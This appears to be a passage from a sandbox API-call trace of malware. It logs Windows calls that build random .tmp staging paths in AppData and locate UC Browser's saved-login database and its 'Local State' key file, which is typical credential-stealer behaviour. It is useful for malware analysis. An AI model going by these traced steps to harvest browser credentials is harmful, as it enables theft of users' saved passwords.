[0203.288] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.289] lstrcpyW (in: lpString1=0x2e20000, lpString2="EInjvyH" | out: lpString1="EInjvyH") returned="EInjvyH" [0203.289] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.289] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.289] lstrlenW (lpString="EInjvyH") returned 7 [0203.289] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.289] lstrcatW (in: lpString1="", lpString2="EInjvyH" | out: lpString1="EInjvyH") returned="EInjvyH" [0203.289] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.290] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.290] GetProcessHeap () returned 0x900000 [0203.290] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.290] lstrlenW (lpString="EInjvyH") returned 7 [0203.290] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.290] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.290] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.290] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.290] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="EInjvyH" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EInjvyH") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EInjvyH" [0203.290] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.291] lstrlenW (lpString=".tmp") returned 4 [0203.291] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.291] lstrlenW (lpString=".tmp") returned 4 [0203.291] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.291] lstrlenW (lpString=".tmp") returned 4 [0203.291] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EInjvyH") returned 53 [0203.291] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.291] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.291] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.292] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EInjvyH", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EInjvyH.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EInjvyH.tmp" [0203.292] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.292] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.292] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.292] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.292] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.292] lstrlenW (lpString="\\") returned 1 [0203.292] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.293] lstrlenW (lpString="\\") returned 1 [0203.293] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.293] lstrlenW (lpString="\\") returned 1 [0203.293] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.293] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.293] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.293] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.293] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.293] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.293] GetProcessHeap () returned 0x900000 [0203.293] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.294] lstrlenA (lpString="mKjHHGj") returned 7 [0203.294] lstrlenA (lpString="mKjHHGj") returned 7 [0203.294] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.294] lstrcpyA (in: lpString1=0x2d80000, lpString2="mKjHHGj" | out: lpString1="mKjHHGj") returned="mKjHHGj" [0203.294] lstrlenA (lpString="mKjHHGj") returned 7 [0203.294] lstrlenA (lpString="mKjHHGj") returned 7 [0203.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.294] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.294] lstrlenA (lpString="mKjHHGj") returned 7 [0203.294] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="mKjHHGj") returned 8 [0203.294] lstrlenW (lpString="mKjHHGj") returned 7 [0203.294] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.295] lstrlenW (lpString="mKjHHGj") returned 7 [0203.295] lstrcpyW (in: lpString1=0x2e20000, lpString2="mKjHHGj" | out: lpString1="mKjHHGj") returned="mKjHHGj" [0203.295] lstrlenW (lpString="mKjHHGj") returned 7 [0203.295] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.295] lstrcpyW (in: lpString1=0x2eb0000, lpString2="mKjHHGj" | out: lpString1="mKjHHGj") returned="mKjHHGj" [0203.295] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.295] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.295] lstrlenW (lpString="mKjHHGj") returned 7 [0203.295] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.296] lstrcatW (in: lpString1="", lpString2="mKjHHGj" | out: lpString1="mKjHHGj") returned="mKjHHGj" [0203.296] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.296] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.296] GetProcessHeap () returned 0x900000 [0203.296] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.296] lstrlenW (lpString="mKjHHGj") returned 7 [0203.296] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.296] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.296] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.296] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.297] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="mKjHHGj" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mKjHHGj") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mKjHHGj" [0203.297] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.297] lstrlenW (lpString=".tmp") returned 4 [0203.297] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.297] lstrlenW (lpString=".tmp") returned 4 [0203.297] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.297] lstrlenW (lpString=".tmp") returned 4 [0203.297] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mKjHHGj") returned 53 [0203.297] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.297] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.298] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.298] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mKjHHGj", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mKjHHGj.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\mKjHHGj.tmp" [0203.298] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.298] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.298] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.298] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.299] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.299] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.299] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.299] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.299] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.299] lstrlenW (lpString="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17") returned 50 [0203.299] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.299] lstrlenW (lpString="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17") returned 50 [0203.299] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17" | out: lpString1="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17") returned="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17" [0203.299] lstrlenW (lpString="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17") returned 50 [0203.299] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.299] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.300] VirtualAlloc (lpAddress=0x0, dwSize=0xbe, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.300] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.300] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17" [0203.300] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.300] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.300] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.300] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.301] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.301] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.301] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.301] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.301] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.301] lstrlenW (lpString="\\UCBrowser\\User Data_i18n\\Local State") returned 37 [0203.301] VirtualAlloc (lpAddress=0x0, dwSize=0x4c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.302] lstrlenW (lpString="\\UCBrowser\\User Data_i18n\\Local State") returned 37 [0203.302] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\UCBrowser\\User Data_i18n\\Local State" | out: lpString1="\\UCBrowser\\User Data_i18n\\Local State") returned="\\UCBrowser\\User Data_i18n\\Local State" [0203.302] lstrlenW (lpString="\\UCBrowser\\User Data_i18n\\Local State") returned 37 [0203.302] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.302] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.302] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.302] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.302] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\UCBrowser\\User Data_i18n\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\UCBrowser\\User Data_i18n\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\UCBrowser\\User Data_i18n\\Local State" [0203.302] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.302] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\UCBrowser\\User Data_i18n\\Default\\UC Login Data.17") returned 0 [0203.303] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.303] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.303] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.303] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.303] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.304] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.304] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.304] lstrlenW (lpString="\\") returned 1 [0203.304] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.304] lstrlenW (lpString="\\") returned 1 [0203.304] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.304] lstrlenW (lpString="\\") returned 1 [0203.304] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.304] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.304] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.305] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.305] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.305] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.305] GetProcessHeap () returned 0x900000 [0203.305] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.305] lstrlenA (lpString="jkDqao.") returned 7 [0203.305] lstrlenA (lpString="jkDqao.") returned 7 [0203.305] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.305] lstrcpyA (in: lpString1=0x2d80000, lpString2="jkDqao." | out: lpString1="jkDqao.") returned="jkDqao." [0203.305] lstrlenA (lpString="jkDqao.") returned 7 [0203.305] lstrlenA (lpString="jkDqao.") returned 7 [0203.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.306] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.306] lstrlenA (lpString="jkDqao.") returned 7 [0203.306] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="jkDqao.") returned 8 [0203.306] lstrlenW (lpString="jkDqao.") returned 7 [0203.306] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.306] lstrlenW (lpString="jkDqao.") returned 7 [0203.306] lstrcpyW (in: lpString1=0x2df0000, lpString2="jkDqao." | out: lpString1="jkDqao.") returned="jkDqao." [0203.306] lstrlenW (lpString="jkDqao.") returned 7 [0203.306] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.306] lstrcpyW (in: lpString1=0x2e20000, lpString2="jkDqao." | out: lpString1="jkDqao.") returned="jkDqao." [0203.306] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.307] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.307] lstrlenW (lpString="jkDqao.") returned 7 [0203.307] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.307] lstrcatW (in: lpString1="", lpString2="jkDqao." | out: lpString1="jkDqao.") returned="jkDqao." [0203.307] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.307] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.308] GetProcessHeap () returned 0x900000 [0203.308] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.308] lstrlenW (lpString="jkDqao.") returned 7 [0203.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.308] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.308] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.308] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.308] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="jkDqao." | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkDqao.") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkDqao." [0203.308] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.309] lstrlenW (lpString=".tmp") returned 4 [0203.309] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.309] lstrlenW (lpString=".tmp") returned 4 [0203.309] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.309] lstrlenW (lpString=".tmp") returned 4 [0203.309] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkDqao.") returned 53 [0203.309] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.309] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.309] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkDqao.", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkDqao..tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jkDqao..tmp" [0203.310] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.310] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.310] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.310] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.310] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.310] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.310] lstrlenW (lpString="\\") returned 1 [0203.310] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.310] lstrlenW (lpString="\\") returned 1 [0203.310] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.310] lstrlenW (lpString="\\") returned 1 [0203.311] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.311] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.311] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.311] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.311] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.311] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.311] GetProcessHeap () returned 0x900000 [0203.311] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.311] lstrlenA (lpString="wioHDCh") 